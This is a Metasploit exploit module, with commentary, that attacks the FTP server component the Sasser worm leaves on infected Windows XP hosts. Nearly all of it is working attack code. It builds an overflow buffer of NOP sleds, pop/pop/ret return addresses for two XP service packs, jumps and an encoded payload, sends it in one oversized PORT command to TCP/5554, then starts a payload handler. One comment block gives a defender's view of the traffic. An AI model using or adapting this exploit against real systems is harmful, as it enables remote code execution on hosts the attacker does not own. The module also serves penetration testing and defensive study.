##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the FTP server component that the Sasser worm runs on
# infected hosts (see 'Description' below). Only the two Windows XP targets in
# 'Targets' are supported; 'DefaultTarget' => 1 selects "Windows XP SP1".
#
# Defender's view: the module needs one TCP connection to the worm's listener
# (RPORT defaults to 5554, see register_options) and sends a single PORT
# command whose argument is well over 1.8 KB of NOPs plus the payload. A PORT
# argument of that size on TCP/5554 is the on-the-wire observable; a host that
# is listening on 5554 at all is a symptom of the infection rather than a
# legitimate FTP service, and removing the worm removes the listener.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # Supplies the connect / send_cmd / disconnect helpers used in #exploit and
  # the RHOST/RPORT datastore options.
  include Msf::Exploit::Remote::Ftp

  # Module metadata and datastore options.
  #
  # info - Hash of overrides merged by update_info; normally empty.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Sasser Worm avserve FTP PORT Buffer Overflow',
      'Description'    => %q{
          This module exploits the FTP server component of the Sasser worm.
        By sending an overly long PORT command the stack can be overwritten.
      },
      'Author'    => [ '<valsmith[at]metasploit.com>', '<chamuco[at]gmail.com>', 'aushack' ],
      'Arch'        => [ ARCH_X86 ],
      'License'    => MSF_LICENSE,
      'References'    =>
        [
          [ 'OSVDB', '6197'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'     => ['win'],
      'Privileged'    => false,
      'Payload'    =>
        {
          # Bytes reserved for payload.encoded inside the PORT argument (see #exploit).
          'Space'            => 480,
          # Bytes the encoder must avoid; note the FTP-relevant CR, LF and space.
          'BadChars'        => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          # Passed to the payload prologue; the value is module-specific.
          'StackAdjustment'    => -3500,
        },
      'Targets'     =>
      [
        # 'Ret' is the address packed into the buffer in #exploit.
        [ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], #p/p/r (pop/pop/ret) in ws2help.dll
        [ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], #p/p/r (pop/pop/ret)
      ],
      'DisclosureDate' => '2004-05-10',
      'DefaultTarget' => 1))

    # Sasser's FTP component listens on 5554, not the standard FTP port 21.
    register_options(
      [
        Opt::RPORT(5554),
      ])
  end

  # Connects to the listener, sends the single oversized PORT command, then
  # starts the payload handler and closes the control connection.
  #
  # The buffer layout below is byte-exact and tied to the 'Ret' addresses in
  # 'Targets'; it should not be reformatted or reordered.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # NOP sled, a short forward jump (6), two NOPs, then target['Ret'] as a
    # little-endian 32-bit value ('V').
    sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')
    # A relative jump with a large negative displacement, more NOPs, the
    # encoded payload (at most 'Space' bytes), and 1530 trailing NOPs.
    sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)

    # NOTE(review): the trailing false is presumably the mixin's "do not read a
    # reply" flag, since the server is not expected to answer — confirm against
    # Msf::Exploit::Remote::Ftp#send_cmd.
    send_cmd( ['PORT', sploit] , false)

    handler
    disconnect
  end
end